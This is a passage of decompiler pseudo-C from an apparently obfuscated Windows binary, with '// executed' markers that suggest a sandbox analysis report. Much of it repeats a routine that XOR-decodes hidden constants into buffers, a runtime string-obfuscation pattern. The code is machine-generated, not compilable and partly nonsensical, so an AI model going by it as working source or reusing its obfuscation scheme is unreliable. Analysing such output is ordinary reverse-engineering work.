				 *(_t1815 + 4) = _t1459;
				 *((long long*)(_t1815 + 8)) = _t2397;
				 *((long long*)(_t1815 + 0x10)) = _t1763;
				 *((long long*)(_t1815 + 0x18)) = _t1607;
				 *((long long*)(_t1815 + 0x20)) = _t2093;
				asm("movdqa xmm0, [esp+0x3a0]");
				asm("movdqu [ecx+0x28], xmm0");
				 *((long long*)(_t1815 + 0x38)) =  *((intOrPtr*)(_t2470 + 0x3b0));
				_t1115 = E00007FF77FF768B7933E(_t1815);
				_t2279 = _t2470 + 0x30;
				E00007FF77FF768BFB107(_t1115, _t2279);
				_t1609 =  *((intOrPtr*)(_t2279 + 8));
				_t2094 =  *((intOrPtr*)(_t2279 + 0x10));
				 *((long long*)(_t2470 + 0x3a0)) =  *_t2279;
				 *((long long*)(_t2470 + 0x3a8)) = _t1609;
				 *((long long*)(_t2470 + 0x3b0)) = _t1609 + (_t2094 + _t2094 * 2) * 8;
				 *((long long*)(_t2470 + 0x3b8)) = _t1609;
				if (_t2094 == 0) goto 0x68b84227;
				_t2601 = _t2470 + 0x40;
				 *((long long*)(_t2470 + 0x358)) = __r12 + 0x48;
				 *((long long*)(_t2470 + 0x420)) = __r12 + 0x60;
				 *((long long*)(_t2470 + 0x378)) = __r12 + 0x78;
				 *((long long*)(_t2470 + 0x3a8)) = _t1609 + 0x18;
				_t2248 =  *((intOrPtr*)(_t1609 + 8));
				if (_t2248 == 0) goto 0x68b84227;
				 *((long long*)(_t2470 + 0x2c8)) =  *((intOrPtr*)(_t1609 + 0x10));
				0x68bb17c0();
				0x68b8169f(); // executed
				if ( *(_t2470 + 0x30) != 0x1a) goto 0x68b89c75;
				 *((long long*)(_t2470 + 0x2b0)) =  *_t1609;
				 *((long long*)(_t2470 + 0x2b8)) = _t2248;
				_t2097 =  *(_t2470 + 0x38);
				_t2400 =  *((intOrPtr*)(_t2470 + 0x40));
				_t1610 =  *((intOrPtr*)(_t2470 + 0x48));
				_t1825 = _t2400 + (_t1610 + _t1610 * 8) * 8;
				 *((long long*)(_t2470 + 0x2a0)) = _t2097;
				 *((long long*)(_t2470 + 0x2d0)) = _t2097;
				 *(_t2470 + 0x2d8) = _t2400;
				 *(_t2470 + 0x380) = _t1825;
				 *(_t2470 + 0x2e0) = _t1825;
				 *(_t2470 + 0x2e8) = _t2400;
				if (_t1610 == 0) goto 0x68b839e5;
				_t76 = _t2400 + 0x48; // 0x48
				_t2590 = _t76;
				_t2282 = _t2400;
				 *(_t2470 + 0x198) = _t2400;
				_t1612 =  *((intOrPtr*)(_t2590 - 0x40));
				if (_t1612 == 0) goto 0x68b839cd;
				 *((long long*)(_t2601 + 0x40)) =  *((intOrPtr*)(_t2590 - 8));
				asm("repe inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("repe inc ecx");
				 *(_t2470 + 0x30) = _t2400;
				 *(_t2470 + 0x38) = _t2282;
				 *((long long*)(_t2470 + 0x40)) =  *((intOrPtr*)(_t2590 - 0x48));
				 *((long long*)(_t2470 + 0x48)) = _t1612;
				if ( *((long long*)(_t2470 + 0x80)) == 0) goto 0x68b838f7;
				if ( *((long long*)(_t2470 + 0x50)) == 0) goto 0x68b838f7;
				 *(_t2470 + 0xe8) = _t2282;
				memcpy(_t1426, _t1459, 9);
				_t1428 = _t1459 + 0x12;
				_t2606 = _t2470 + 0xf0;
				0x68bb17c0();
				0x68bb17c0();
				_t2250 =  *((intOrPtr*)(_t2470 + 0x1e0));
				E00007FF77FF768BEFD87(_t1612, _t2250);
				 *((long long*)(_t2470 + 0x120)) = _t1612;
				 *((long long*)(_t2470 + 0x128)) =  *((intOrPtr*)(_t2470 + 0x1c0));
				memcpy(??, ??, ??);
				 *((long long*)(_t2470 + 0x130)) = _t2250;
				r8d = 0;
				E00007FF77FF768B8E281();
				_t1502 =  *((long long*)(_t2470 + 0x210));
				if (_t1502 == 0) goto 0x68b83912;
				asm("movdqu xmm0, [eax]");
				asm("movups xmm1, [eax+0x10]");
				asm("movups xmm2, [eax+0x20]");
				asm("movups xmm3, [eax+0x30]");
				asm("movaps [esp+0x120], xmm3");
				asm("movaps [esp+0x110], xmm2");
				asm("movaps [esp+0x100], xmm1");
				asm("movdqa [esp+0xf0], xmm0");
				_t1121 = E00007FF77FF768B7933E(_t2606);
				0x68b79458();
				goto 0x68b838ff;
				0x68b79458();
				if (_t1502 != 0) goto 0x68b83779;
				goto 0x68b839c5;
				_t2251 =  *((intOrPtr*)(_t2470 + 0x220));
				asm("movdqu xmm0, [eax+0x10]");
				asm("movups xmm1, [eax+0x20]");
				asm("movups xmm2, [eax+0x30]");
				asm("movdqa [esp+0xf0], xmm0");
				asm("movaps [esp+0x100], xmm1");
				asm("movaps [esp+0x110], xmm2");
				 *((long long*)(_t2470 + 0x120)) =  *((intOrPtr*)(_t2470 + 0x258));
				0x68b79458();
				if (_t2251 == 0) goto 0x68b838e5;
				_t1616 =  *(_t2470 + 0xe8);
				 *_t1616 =  *((intOrPtr*)(_t2470 + 0x218));
				 *((long long*)(_t1616 + 8)) = _t2251;
				asm("movdqa xmm0, [esp+0xf0]");
				asm("movaps xmm1, [esp+0x100]");
				asm("movaps xmm2, [esp+0x110]");
				asm("movdqu [eax+0x10], xmm0");
				asm("movups [eax+0x20], xmm1");
				asm("movups [eax+0x30], xmm2");
				 *((long long*)(_t1616 + 0x40)) =  *((intOrPtr*)(_t2470 + 0x120));
				goto 0x68b838ff;
				 *(_t2470 + 0x2d8) =  *(_t2470 + 0x380);
				_t1767 = _t2470 + 0x210;
				E00007FF77FF768B7A11A(_t1121 * 0x8e38e38f, _t2470 + 0x2d0);
				 *(_t2470 + 0x360) =  *((intOrPtr*)(_t2470 + 0x2a0));
				 *((long long*)(_t2470 + 0x368)) =  *(_t2470 + 0x198);
				 *(_t2470 + 0x370) = _t2606 >> 6;
				0x68b776ca();
				0x68bb17c0();
				E00007FF77FF768B827BD(_t1428, _t1459, __esp + 0xc, _t2470 + 0x30,  *((intOrPtr*)(_t2470 + 0x298)), _t1767); // executed
				if ( *(_t2470 + 0x30) != 0x1a) goto 0x68b89cbf;
				_t2292 =  *(_t2470 + 0x38);
				_t2622 =  *((intOrPtr*)(_t2470 + 0x40));
				_t1620 =  *((intOrPtr*)(_t2470 + 0x48));
				_t1841 = _t2622 + _t1620 * 0x70;
				 *(_t2470 + 0x160) = _t2292;
				 *(_t2470 + 0x168) = _t2622;
				 *((long long*)(_t2470 + 0x170)) = _t1841;
				 *(_t2470 + 0x178) = _t2622;
				if (_t1620 == 0) goto 0x68b83d1e;
				 *((long long*)(_t2470 + 0x2a0)) = _t1841;
				 *(_t2470 + 0x198) = _t2292;
				_t144 = _t2622 + 0x70; // 0x70
				_t2609 = _t144;
				_t2404 = _t2622;
				 *(_t2470 + 0xe8) = _t2622;
				_t1621 =  *((intOrPtr*)(_t2609 - 0x58));
				if (_t1621 == 0) goto 0x68b83d06;
				_t147 = _t2609 - 0x70; // 0x0
				 *((long long*)(_t2601 + 0x10)) =  *((intOrPtr*)(_t147 + 0x10));
				asm("movdqu xmm0, [ecx]");
				asm("repe inc ecx");
				memcpy(_t1428, _t1459, 0xa);
				 *(_t2470 + 0x30) = _t2622;
				 *(_t2470 + 0x38) = _t2404;
				 *((long long*)(_t2470 + 0x58)) = _t1621;
				if ( *((long long*)(_t2470 + 0x90)) == 0) goto 0x68b83c90;
				if ( *((long long*)(_t2470 + 0x60)) == 0) goto 0x68b83c90;
				memcpy(_t1459 + 0x14, _t1459, 0xe);
				0x68bb17c0();
				0x68bb17c0();
				_t2256 =  *((intOrPtr*)(_t2470 + 0x1f0));
				E00007FF77FF768BEFD87(_t1621, _t2256);
				 *((long long*)(_t2470 + 0x250)) = _t1621;
				 *((long long*)(_t2470 + 0x258)) =  *((intOrPtr*)(_t2470 + 0x1d0));
				memcpy(??, ??, ??);
				 *((long long*)(_t2470 + 0x260)) = _t2256;
				0x68bb17c0();
				asm("movups xmm0, [esp+0x1a0]");
				asm("movups [esp+0x210], xmm0");
				r8d = 0;
				0x68b8e6f0();
				_t1768 =  *((intOrPtr*)(_t2470 + 0x108));
				_t1509 = _t1768;
				if (_t1509 == 0) goto 0x68b83c9a;
				 *(_t2470 + 0x350) =  *((intOrPtr*)(_t2470 + 0x100));
				asm("movups xmm0, [esp+0xf0]");
				asm("movaps [esp+0x340], xmm0");
				memcpy(_t1459 + 0x1c, _t1459, 0xa);
				E00007FF77FF768B79364();
				 *((long long*)(_t2404 + 0x10)) =  *(_t2470 + 0x350);
				asm("movdqa xmm0, [esp+0x340]");
				asm("movdqu [ebp], xmm0");
				 *((long long*)(_t2404 + 0x18)) = _t1768;
				memcpy(_t1459 + 0x14, _t1459, 0xa);
				goto 0x68b83ce8;
				E00007FF77FF768B79364();
				goto 0x68b83cf0;
				asm("movdqu xmm0, [eax]");
				asm("movups xmm1, [eax+0x10]");
				asm("movups xmm2, [eax+0x20]");
				asm("movups xmm3, [eax+0x30]");
				asm("movaps [esp+0x240], xmm3");
				asm("movaps [esp+0x230], xmm2");
				asm("movaps [esp+0x220], xmm1");
				asm("movdqa [esp+0x210], xmm0");
				_t1132 = E00007FF77FF768B7933E(_t1767);
				E00007FF77FF768B79364();
				_t2603 = _t2470 + 0x40;
				if (_t1509 != 0) goto 0x68b83ad0;
				 *(_t2470 + 0x168) =  *((intOrPtr*)(_t2470 + 0x2a0));
				E00007FF77FF768B7A069(_t1132 * 0x92492493, _t2470 + 0x160);
				 *((long long*)(_t2470 + 0x388)) =  *(_t2470 + 0x198);
				 *((long long*)(_t2470 + 0x390)) =  *(_t2470 + 0xe8);
				 *((long long*)(_t2470 + 0x398)) = _t1767;
				0x68b775f1();
				0x68bb17c0();
				E00007FF77FF768B81F59(_t1459 + 0x14, _t1459, __esp + 0x3c, _t2470 + 0x30,  *((intOrPtr*)(_t2470 + 0x298)), _t1767); // executed
				if ( *(_t2470 + 0x30) != 0x1a) goto 0x68b89cfe;
				_t2613 =  *(_t2470 + 0x38);
				_t2625 =  *((intOrPtr*)(_t2470 + 0x40));
				_t1626 =  *((intOrPtr*)(_t2470 + 0x48));
				_t1858 = _t2625 + (_t1626 << 6);
				 *((long long*)(_t2470 + 0x2d0)) = _t2613;
				 *(_t2470 + 0x2d8) = _t2625;
				 *(_t2470 + 0x2e0) = _t1858;
				 *(_t2470 + 0x2e8) = _t2625;
				if (_t1626 == 0) goto 0x68b84027;
				 *(_t2470 + 0xe8) = _t1858;
				_t212 = _t2625 + 0x40; // 0x40
				_t2596 = _t212;
				_t2261 = _t2625;
				_t1627 =  *((intOrPtr*)(_t2596 - 0x28));
				if (_t1627 == 0) goto 0x68b8401f;
				_t214 = _t2596 - 0x40; // 0x0
				_t2113 =  *((intOrPtr*)(_t214 + 0x10));
				 *((long long*)(_t2603 + 0x10)) = _t2113;
				asm("movups xmm0, [ecx]");
				asm("inc ecx");
				asm("repe inc ecx");
				asm("inc ecx");
				asm("movups [ecx+0x10], xmm1");
				asm("movdqu [ecx], xmm0");
				 *(_t2470 + 0x30) = _t2625;
				 *(_t2470 + 0x38) = _t2261;
				 *((long long*)(_t2470 + 0x58)) = _t1627;
				if ( *((long long*)(_t2470 + 0x60)) == 0) goto 0x68b83f64;
				asm("inc ecx");
				_t1628 =  *((intOrPtr*)(_t2603 + 0x10));
				asm("inc ecx");
				asm("inc ecx");
				asm("movaps [esp+0x1d0], xmm2");
				asm("movaps [esp+0x1c0], xmm1");
				 *((long long*)(_t2470 + 0x1b0)) = _t1628;
				 *((long long*)(_t2470 + 0x1b8)) =  *((intOrPtr*)(_t2603 + 0x18));
				asm("movaps [esp+0x1a0], xmm0");
				_t2409 =  *((intOrPtr*)(_t2470 + 0x1c0));
				E00007FF77FF768BEFD87(_t1628, _t2409);
				 *((long long*)(_t2470 + 0x100)) = _t1628;
				 *((long long*)(_t2470 + 0x108)) = _t2113;
				memcpy(??, ??, ??);
				 *((long long*)(_t2470 + 0x110)) = _t2409;
				0x68bb17c0();
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movups [esp+0xf0], xmm0");
				r8d = 0;
				E00007FF77FF768B8E4F2();
				_t1514 =  *((long long*)(_t2470 + 0x210));
				if (_t1514 == 0) goto 0x68b83f7f;
				asm("movdqu xmm0, [eax]");
				asm("movups xmm1, [eax+0x10]");
				asm("movups xmm2, [eax+0x20]");
				asm("movups xmm3, [eax+0x30]");
				asm("movaps [esp+0x120], xmm3");
				asm("movaps [esp+0x110], xmm2");
				asm("movaps [esp+0x100], xmm1");
				asm("movdqa [esp+0xf0], xmm0");
				_t1139 = E00007FF77FF768B7933E(_t2470 + 0xf0);
				goto 0x68b83f67;
				E00007FF77FF768B792F5();
				if (_t1514 != 0) goto 0x68b83df1;
				goto 0x68b84017;
				 *((long long*)(_t2470 + 0x170)) =  *((intOrPtr*)(_t2470 + 0x228));
				asm("movups xmm0, [ecx]");
				asm("movaps [esp+0x160], xmm0");
				_t1772 =  *((intOrPtr*)(_t2470 + 0x230));
				asm("movdqu xmm0, [eax]");
				asm("movups xmm1, [eax+0x10]");
				asm("movdqa [esp+0xf0], xmm0");
				asm("movaps [esp+0x100], xmm1");
				E00007FF77FF768B792F5();
				if (_t1772 == 0) goto 0x68b83f6c;
				 *((long long*)(_t2261 + 0x10)) =  *((intOrPtr*)(_t2470 + 0x170));
				asm("movaps xmm0, [esp+0x160]");
				asm("movups [edi], xmm0");
				 *((long long*)(_t2261 + 0x18)) = _t1772;
				asm("movdqa xmm0, [esp+0xf0]");
				asm("movaps xmm1, [esp+0x100]");
				asm("movdqu [edi+0x20], xmm0");
				asm("movups [edi+0x30], xmm1");
				goto 0x68b83f6c;
				 *(_t2470 + 0x2d8) =  *(_t2470 + 0xe8);
				_t2263 = _t2261 + 0x40 - _t2625;
				_t2411 = _t2263 >> 6;
				E00007FF77FF768B7A0CB(_t1139, _t1772, _t2470 + 0x2d0, _t2470 + 0xf0);
				 *((long long*)(_t2470 + 0x340)) = _t2613;
				 *(_t2470 + 0x348) = _t2625;
				 *(_t2470 + 0x350) = _t2411;
				0x68b77596();
				_t2599 =  *(_t2470 + 0x370);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t2470 + 0x298)) + 0x48)) -  *((intOrPtr*)( *((intOrPtr*)(_t2470 + 0x298)) + 0x58)) - _t2599 < 0) goto 0x68b841cf;
				_t2303 =  *((intOrPtr*)(_t2470 + 0x298));
				memcpy(??, ??, ??);
				 *((intOrPtr*)(_t2303 + 0x58)) =  *((intOrPtr*)(_t2303 + 0x58)) + _t2599;
				_t2600 = _t2303;
				 *(_t2470 + 0x370) = 0;
				_t1773 =  *((intOrPtr*)(_t2470 + 0x398));
				if ( *((intOrPtr*)(_t2303 + 0x60)) -  *((intOrPtr*)(_t2303 + 0x70)) - _t1773 < 0) goto 0x68b841f0;
				memcpy(??, ??, ??);
				 *((intOrPtr*)(_t2600 + 0x70)) =  *((intOrPtr*)(_t2600 + 0x70)) + _t1773;
				 *((long long*)(_t2470 + 0x398)) = 0;
				if ( *((intOrPtr*)(_t2600 + 0x78)) -  *((intOrPtr*)(_t2600 + 0x88)) - _t2411 < 0) goto 0x68b8420a;
				memcpy(??, ??, ??);
				 *((intOrPtr*)(_t2600 + 0x88)) =  *((intOrPtr*)(_t2600 + 0x88)) + _t2411;
				 *(_t2470 + 0x350) = 0;
				E00007FF77FF768B79C3F();
				E00007FF77FF768B79ACC(); // executed
				E00007FF77FF768B79B23();
				if ( *((intOrPtr*)(_t2470 + 0x2b0)) == 0) goto 0x68b841af;
				HeapFree(??, ??, ??);
				_t1775 = _t2470 + 0x210;
				if ( *((intOrPtr*)(_t2470 + 0x3a8)) !=  *((intOrPtr*)(_t2470 + 0x3b0))) goto 0x68b836af;
				goto 0x68b84227;
				E00007FF77FF768DB92F6( *((intOrPtr*)(_t2470 + 0x3a8)) -  *((intOrPtr*)(_t2470 + 0x3b0)),  *((intOrPtr*)(_t2470 + 0x358)), _t2625, _t2600);
				_t1641 =  *((intOrPtr*)(_t2470 + 0x298));
				goto 0x68b8408d;
				E00007FF77FF768DB915D( *((intOrPtr*)(_t2470 + 0x3a8)) -  *((intOrPtr*)(_t2470 + 0x3b0)),  *((intOrPtr*)(_t2470 + 0x420)),  *((intOrPtr*)(_t1641 + 0x58)), _t1775);
				goto 0x68b840ec;
				_t1147 = E00007FF77FF768DB9099( *((intOrPtr*)(_t2470 + 0x3a8)) -  *((intOrPtr*)(_t2470 + 0x3b0)),  *((intOrPtr*)(_t2470 + 0x378)),  *((intOrPtr*)(_t2600 + 0x70)), _t2411);
				goto 0x68b8412b;
				E00007FF77FF768B7996A();
				0x68bdd324();
				asm("xorps xmm6, xmm6");
				asm("movaps [esp+0x160], xmm6");
				 *((long long*)(_t2470 + 0x170)) = 0;
				 *(_t2470 + 0x178) = 0x68e2f500;
				 *((long long*)(_t2470 + 0x180)) = _t1641;
				 *((long long*)(_t2470 + 0x188)) =  *((intOrPtr*)(_t2600 + 0x88));
				 *(_t2470 + 0x30) = 0x68db5c5d;
				 *(_t2470 + 0x30) = 0x57d9cd42;
				_t2128 =  *(_t2470 + 0x30);
				E00007FF77FF768B7CD45(_t1147, 0,  *(_t2470 + 0x30), _t2128);
				_t1149 = E00007FF77FF768BEFD87(0x57d9cd42,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0x57d9cd42;
				 *(_t2470 + 0xf8) = _t2128;
				 *_t2128 = 0x14b6ff87 ^  *0x57d9cd42;
				_t2128[1] = 0x0fe26dca ^  *0xA3B8E3AB57D9CD4A;
				_t2128[1] =  *0xA3B8E3AB57D9CD4E ^ 0x00000007;
				 *((long long*)(_t2470 + 0x100)) = 0xd;
				 *(_t2470 + 0x30) = 0x68dbc2ae;
				 *(_t2470 + 0x30) = 0x22844bdf;
				E00007FF77FF768B7D214(_t1149, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("movaps [esp+0x30], xmm6");
				asm("movaps [esp+0x40], xmm6");
				_t2413 =  *0x7FF768DC2848 ^  *0xC52E9D2622844BDF;
				 *(_t2470 + 0x30) = _t2413;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b84339;
				E00007FF77FF768BEFD87(0x22844bdf, 0);
				_t2553 = _t2470 + 0x210;
				 *_t2553 = 0x22844bdf;
				 *((long long*)(_t2553 + 8)) = 0x68dc2848;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2553 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				_t2499 =  *((intOrPtr*)(_t2470 + 0x1a8));
				if (_t2499 == 0) goto 0x68b843c7;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b843c7;
				_t1152 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68dbcf82;
				 *(_t2470 + 0x30) = 0x4ebdc184;
				E00007FF77FF768B7BF98(_t1152, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x2d0], xmm0");
				r9b = 1;
				r8d =  *(_t2263 + 0x68dc2868) & 0x000000ff;
				r11d =  *((_t2263 | 0x00000002) + 0x68dc2868) & 0x000000ff;
				r14d =  *((_t2263 | 0x00000003) + 0x68dc2868) & 0x000000ff;
				_t2135 = (_t2263 | 0x00000007) << 0x38;
				_t2617 = _t2470 + 0x1a0 << 0x18;
				_t2585 = __r11 << 0x10;
				_t1783 = (_t1775 << 0x00000008 | _t2499 | _t2585 | _t2617 | (_t2263 | 0x00000004) << 0x00000020 | _t2413 << 0x00000028 | (_t2263 | 0x00000006) << 0x00000030 | _t2135) ^  *(0x4ebdc184 + _t2263);
				 *(_t2470 + _t2263 + 0x2d0) = _t1783;
				r9d = 0;
				if ((r9b & 0x00000001) != 0) goto 0x68b84408;
				 *(_t2470 + 0x2e0) =  *0xF089178A4EBDC194 ^ 0x00000055;
				E00007FF77FF768BEFD87(0x4ebdc184, (_t2263 | 0x00000004) << 0x20);
				 *(_t2470 + 0xf0) = 0x4ebdc184;
				 *(_t2470 + 0xf8) = _t2135;
				asm("movaps xmm0, [esp+0x2d0]");
				asm("movups [edx], xmm0");
				 *((char*)(_t2135 + 0x10)) =  *(_t2470 + 0x2e0);
				 *((long long*)(_t2470 + 0x100)) = 0x11;
				 *(_t2470 + 0x30) = 0x68dc4129;
				 *(_t2470 + 0x30) = 0x41d3fc02;
				E00007FF77FF768B7C16F( *((_t2263 | 0x00000007) + 0x68dc2868) & 0x000000ff, 0x41d3fc02,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2879 ^  *0x419E927B41D3FC02;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b8453f;
				E00007FF77FF768BEFD87(0x41d3fc02, 0);
				_t2554 = _t2470 + 0x210;
				 *_t2554 = 0x41d3fc02;
				 *((long long*)(_t2554 + 8)) = 0x68dc2879;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2554 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b845cd;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b845cd;
				_t1160 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68db8131;
				 *(_t2470 + 0x30) = 0xf20120e9;
				_t2139 =  *(_t2470 + 0x30);
				E00007FF77FF768B7DA43(_t1160, 0,  *(_t2470 + 0x30), _t2139);
				_t1162 = E00007FF77FF768BEFD87(0xf20120e9,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0xf20120e9;
				 *(_t2470 + 0xf8) = _t2139;
				 *_t2139 = 0xa70bc469 ^  *0xf20120e9;
				_t2139[1] =  *0x2FEB8CBCF20120F1 ^ 0x0000004f;
				 *((long long*)(_t2470 + 0x100)) = 9;
				 *(_t2470 + 0x30) = 0x68dc010a;
				 *(_t2470 + 0x30) = 0xda0ce3ed;
				E00007FF77FF768B7C9B4(_t1162, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2899 ^  *0x9B055B3BDA0CE3ED;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b8467b;
				E00007FF77FF768BEFD87(0xda0ce3ed, 0);
				_t2555 = _t2470 + 0x210;
				 *_t2555 = 0xda0ce3ed;
				 *((long long*)(_t2555 + 8)) = 0x68dc2899;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2555 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b84709;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b84709;
				_t1165 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68db8339;
				 *(_t2470 + 0x30) = 0x2cea788a;
				_t2143 =  *(_t2470 + 0x30);
				E00007FF77FF768B7DEB2(_t1165, 0,  *(_t2470 + 0x30), _t2143);
				_t1167 = E00007FF77FF768BEFD87(0x2cea788a,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0x2cea788a;
				 *(_t2470 + 0xf8) = _t2143;
				 *_t2143 = 0x21051234 ^  *0x2cea788a;
				_t2143[1] =  *0xA76F7C2F2CEA7892 ^ 0x000000fa;
				 *((long long*)(_t2470 + 0x100)) = 9;
				 *(_t2470 + 0x30) = 0x68db64a8;
				 *(_t2470 + 0x30) = 0xc8440f6b;
				E00007FF77FF768B7C4D8(_t1167, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC28B9 ^  *0x3246B3ECC8440F6B;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b847b7;
				E00007FF77FF768BEFD87(0xc8440f6b, 0);
				_t2556 = _t2470 + 0x210;
				 *_t2556 = 0xc8440f6b;
				 *((long long*)(_t2556 + 8)) = 0x68dc28b9;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2556 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b84845;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b84845;
				_t1170 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68db8890;
				 *(_t2470 + 0x30) = 0x3d429041;
				_t2147 =  *(_t2470 + 0x30);
				E00007FF77FF768B7C337(_t1170, 0,  *(_t2470 + 0x30), _t2147);
				_t1172 = E00007FF77FF768BEFD87(0x3d429041,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0x3d429041;
				 *(_t2470 + 0xf8) = _t2147;
				 *_t2147 = 0x5a6fbd16 ^  *0x3d429041;
				 *((long long*)(_t2470 + 0x100)) = 8;
				 *(_t2470 + 0x30) = 0x68dc222d;
				 *(_t2470 + 0x30) = 0x436f9a4;
				E00007FF77FF768B7DD87(_t1172, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC28D9 ^  *0x48C3B7100436F9A4;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b848ea;
				E00007FF77FF768BEFD87(0x436f9a4, 0);
				_t2557 = _t2470 + 0x210;
				 *_t2557 = 0x436f9a4;
				 *((long long*)(_t2557 + 8)) = 0x68dc28d9;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2557 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b84978;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b84978;
				HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = "lumn out of bounds";
				 *(_t2470 + 0x30) = 0x373630ac;
				_t2151 =  *(_t2470 + 0x30);
				0x68b7c75b();
				_t1176 = E00007FF77FF768BEFD87(0x373630ac,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0x373630ac;
				 *(_t2470 + 0xf8) = _t2151;
				 *_t2151 = 0x30a75439 ^  *0x373630ac;
				_t2151[1] =  *0x3F155D75373630B4 ^ 0x000000d8;
				 *((long long*)(_t2470 + 0x100)) = 9;
				 *(_t2470 + 0x30) = 0x68db5d39;
				 *(_t2470 + 0x30) = 0x2762292c;
				E00007FF77FF768B7CC66(_t1176, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC28F9 ^  *0xD12D5D772762292C;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b84a26;
				E00007FF77FF768BEFD87(0x2762292c, 0);
				_t2558 = _t2470 + 0x210;
				 *_t2558 = 0x2762292c;
				 *((long long*)(_t2558 + 8)) = 0x68dc28f9;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2558 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b84ab4;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b84ab4;
				HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68db78a0;
				 *(_t2470 + 0x30) = 0xe65f37a9;
				_t2155 =  *(_t2470 + 0x30);
				E00007FF77FF768B7BED7(_t2155);
				_t1180 = E00007FF77FF768BEFD87(0xe65f37a9,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0xe65f37a9;
				 *(_t2470 + 0xf8) = _t2155;
				 *_t2155 = 0x73fb94c6 ^  *0xe65f37a9;
				 *((long long*)(_t2470 + 0x100)) = 8;
				 *(_t2470 + 0x30) = 0x68db9b3a;
				 *(_t2470 + 0x30) = 0xecd51b78;
				E00007FF77FF768B7BFE2(_t1180, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2919 ^  *0xF1F76FEEECD51B78;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b84b59;
				E00007FF77FF768BEFD87(0xecd51b78, 0);
				_t2559 = _t2470 + 0x210;
				 *_t2559 = 0xecd51b78;
				 *((long long*)(_t2559 + 8)) = 0x68dc2919;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
